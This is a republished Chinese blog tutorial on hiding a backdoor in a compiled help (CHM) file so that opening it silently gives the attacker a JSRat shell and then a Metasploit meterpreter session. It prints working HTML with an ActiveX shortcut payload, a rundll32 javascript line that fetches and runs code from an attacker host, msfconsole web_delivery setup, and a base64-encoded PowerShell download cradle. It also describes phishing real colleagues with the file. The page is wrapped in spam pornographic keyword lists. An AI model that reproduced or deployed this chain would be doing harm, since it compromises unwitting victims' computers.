日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

高级组合技打造“完美” 捆绑后门

發布時間:2023/12/13 编程问答 29 豆豆
生活随笔 收集整理的這篇文章主要介紹了 高级组合技打造“完美” 捆绑后门 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

0x00 簡介


之前寫過一篇關于客戶端釣魚的文章:《使用powershell Client進行有效釣魚》中,在使用各個Client進行測試的過程中,個人發現CHM文件是最好用的一個,但是其缺點就是會彈黑框,這樣就會讓被攻擊者察覺。那么怎么讓他不彈黑框呢?那就是本文要介紹的內容啦~

0x01 CHM 簡介


在介紹怎么使用CHM來作為后門之前,首先要知道CMH是什么東西。

CHM(Compiled Help Manual)即“已編譯的幫助文件”。它是微軟新一代的幫助文件格式,利用HTML作源文,把幫助內容以類似數據庫的形式編譯儲存。CHM支持Javas cript、VBs cript、ActiveX、Java Applet、Flash、常見圖形文件(GIF、JPEG、PNG)、音頻視頻文件(MID、WAV、AVI)等等,并可以通過URL與Internet聯系在一起。因為使用方便,形式多樣也被采用作為電子書的格式。

0x02 CHM 制作


CHM的制作方法很多。有多款工具可以使用,這里就不在做詳細的介紹了。本次測試使用了EasyCHM來制作CHM文件,使用起來非常簡單。

新建如下目錄,文件內容隨意:

打開EasyCHM,新建->瀏覽。選擇該目錄。默認文件類型:

點擊確認,即可看到預覽的CHM文件:

選擇編譯,即可編譯成CHM文件。

0x03 CHM Execute Command


14年的時候@ithurricanept 在twitter上發了一個demo,通過CHM運行計算器:

?

利用代碼如下:

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body> command exec <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=',calc.exe'><PARAM name="Item2" value="273,1,1"> </OBJECT> <SCRIPT> x.Click(); </SCRIPT> </body></html>

?將以上代碼寫入html,置于工程目錄進行編譯,生成CHM文件,運行此文件,彈出計算器:

0x04 去除彈框


有測試過nishang Out-CHM 的同學會發現,運行生成的CHM文件的時候會看到明顯的彈框。就像

某個晚上突然腦洞了一下,想到了一個好的方式來讓他不顯示彈框,即結合使用JavaScript Backdoor。經過測試,成功實現在不彈框的情況下獲取meterpreter會話,此次測試使用一個我修改過的python版 JSRat.ps1 ,地址為:MyJSRat。使用方式詳見 readme。

以下為完整的測試過程:

1、結合CHM + JSBackdoor

使用交互模式的JSRat server:

python MyJSRat.py -i 192.168.1.101 -p 8080

?

訪問 http://192.168.1.101:8080/wtf 獲取攻擊代碼如下:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}

?經過多次測試,成功將以上命令寫入chm,其Html代碼為:

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body> This is a demo ! <br> <OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1> <PARAM name="Command" value="ShortCut"><PARAM name="Button" value="Bitmap::shortcut"><PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'><PARAM name="Item2" value="273,1,1"> </OBJECT> <SCRIPT> x.Click(); </SCRIPT> </body></html>

?編譯以后運行,可以成功獲取JS交互shell:

直接執行cmd /c command 是會有黑框的,可以使用run來避免顯示黑框。執行run以后,輸入 whoami > e:\1.txt 之后通過read 來獲取回顯。

?

2、獲取meterpreter會話

此次測試獲取meterpreter會話的方式是通過執行powershell命令,直接獲取,當獲取客戶端JS 交互shell之后自動執行powershell命令,獲取meterpreter會話。具體操作如下:

開啟MSF web_delivery:

~ msfconsole -Lq msf > use exploit/multi/script/web_delivery msf exploit(web_delivery) > set target 2 target => 2 msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(web_delivery) > set lhost 192.168.1.101 lhost => 192.168.1.101 msf exploit(web_delivery) > set lport 6666 lport => 6666 msf exploit(web_delivery) > set SRVPORT 8081 SRVPORT => 8081 msf exploit(web_delivery) > set uripath / uripath => / msf exploit(web_delivery) > exploit [*] Exploit running as background job. msf exploit(web_delivery) > [*] Started reverse TCP handler on 192.168.1.101:6666 [*] Using URL: http://0.0.0.0:8081/ [*] Local IP: http://192.168.1.101:8081/ [*] Server started. [*] Run the following command on the target machine: powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');

?裝有powershell的客戶端執行以下命令則可獲取meterpreter會話:

powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');

?由于存在特殊字符,我們可以把以上代碼編碼為base64格式,將以下代碼存入power.txt

$n=new-object net.webclient; $n.proxy=[Net.WebRequest]::GetSystemWebProxy(); $n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials; IEX $n.downloadstring('http://192.168.1.101:8081/');

?執行以下命令:

cat power.txt | iconv --to-code UTF-16LE |base64

?

最終要執行的powershell命令為:

powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA

?使用執行命令模式直接獲取meterpreter會話:

python MyJSRat.py -i 192.168.1.101 -p 8080 -c "powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAb

?測試過程中,從運行CHM到獲取meterpreter,客戶端無明顯異常,全程無黑框彈出,獲取到meterpreter會話如下圖:

?

3、是否被殺?

可能很多人會問,會不會被殺,下面是virscan的查殺結果:

http://r.virscan.org/report/6173ee9c62d29806bb84035a8f1738ba

0x05 利用場景

一張圖說明(讓我猜猜你會不會點):

注: 隨便找了幾個漏洞利用工具修改了文件名,并不代表原作者分享的工具有問題。

?

0x06 實際測試

?


?

是用上述方式制作chm文件,命名為一個比較有吸引力的名字,比如在公司技術群發了一個名字為"制作免殺后門.chm"的文件,實際測試結果如下圖:

成功獲取多個人的meterpreter會話。

0x07 防御


目前我還沒查到什么防御的姿勢,知道的小伙伴可以分享一下。最好就是提高個人安全意識,對于這類文件,多注意一下,盡量別亂點,如果非要點,可以放到虛擬機里面。使用procexp.exe可以看到存在后門的chm文件會開啟新的進程:

對于碰到這種后門,怎么溯源呢,其實也很簡單,chm是可以反編譯為html的。 使用windows自帶的hh.exe 則可進行反編譯。命令如下:

C:\Users\evi1cg\Desktop>hh -decompile test poc.chm #test 為當前目錄的test文件夾

?執行結果如下:

?

0x08 小結


此次測試就是對一些已知的攻擊手法進行結合,結果是讓此捆綁后門更加隱蔽,近乎“完美”,美中不足的是在文件開啟的時候會出現短暫的卡頓。有時候小漏洞結合起來能造成大危害,小手法結合起來也能成大殺器。本著分享的精神將此姿勢介紹,希望小伙伴們能免受其害。

0x09 參考


  • https://twitter.com/ithurricanept/status/534993743196090368
  • https://github.com/samratashok/nishang/blob/master/Client/Out-CHM.ps1
  • http://drops.wooyun.org/tips/11764
  • https://github.com/samratashok/nishang
  • 本文由evi1cg原創并首發于烏云drops

    轉載于:https://www.cnblogs.com/croso/p/5380318.html

    總結

    以上是生活随笔為你收集整理的高级组合技打造“完美” 捆绑后门的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

    主站蜘蛛池模板: 国产亚洲精品av | 欧美日韩欧美日韩在线观看视频 | 国产a久久麻豆入口 | 国产男女猛烈无遮挡a片漫画 | 欧美黑吊大战白妞 | 九九av| 日本一区二区三区免费电影 | 精品一区在线 | 一区二区三区精品久久久 | 国产成人综合久久 | 欧美一级生活片 | www色中色| 成人精品网 | 明里柚番号 | 涩涩网址 | 日韩精品在线观看网站 | 白浆四溢| 日本午夜电影网站 | 乡村性满足hd | 欧美黑人精品一区二区不卡 | 日本一区二区不卡在线观看 | 秋霞一区二区三区 | 在线a网 | 岛国a视频| 综合精品在线 | 国产精品99久久免费黑人人妻 | 国产亚洲片 | 久月婷婷| 麻豆传媒在线视频 | 日本三级韩国三级三级a级按摩 | 深夜福利影院 | 午夜片在线观看 | 自拍偷拍激情视频 | 九色视频91| 亚洲免费黄色网址 | 精品丰满人妻无套内射 | 亚洲色成人www永久网站 | 亚洲激情网址 | 成人精品一区二区三区电影 | 一区二区精品久久 | 精品无码久久久久成人漫画 | 国产精品99久久久久久久久 | 男人的天堂a在线 | 久久久久久久一区二区 | 成人国产精品视频 | 欧美最猛性xxxxx(亚洲精品) | 免费网站在线观看黄色 | av色成人| 精品久久久亚洲 | 国产亚洲性欧美日韩在线观看软件 | wwwwyoujizzcom| www狠狠干 | 成人福利一区二区 | www色中色| 丰满女人又爽又紧又丰满 | 麻豆天天躁天天揉揉av | 中文字幕亚洲无线码在线一区 | 亚洲av鲁丝一区二区三区 | 动漫av一区二区 | 九九精品视频免费 | www.色婷婷 | 男女互操在线观看 | 99成人国产精品视频 | 成人爽a毛片一区二区 | 久久永久视频 | 国产视频xxx | 在线99视频 | 成人99视频| 精品国产久 | 欧美xxxx黑人 | 国产美女av在线 | 国产美女白浆 | 日韩特黄毛片 | 午夜不卡久久精品无码免费 | 香蕉伊人网 | 国产天天综合 | 欧美在线一二三四区 | 成年人免费视频网站 | 男女做的视频 | 日韩一二三区 | 男女性杂交内射妇女bbwxz | www.av小说| 国产jk精品白丝av在线观看 | 欧美精品国产动漫 | 成人看片在线观看 | 欧美视频在线免费看 | 日韩精品一二三区 | 欧美熟妇毛茸茸 | 97久久精品视频 | wwwxxx亚洲 | 一区二区成人在线观看 | 一边摸一边做爽的视频17国产 | av噜噜在线| 日本黄色免费网站 | 亚洲AV无码一区二区伊人久久 | www视频在线观看网站 | 亚洲天堂av网站 | 国产精品久久久久久久久免费桃花 | 激情视频久久 |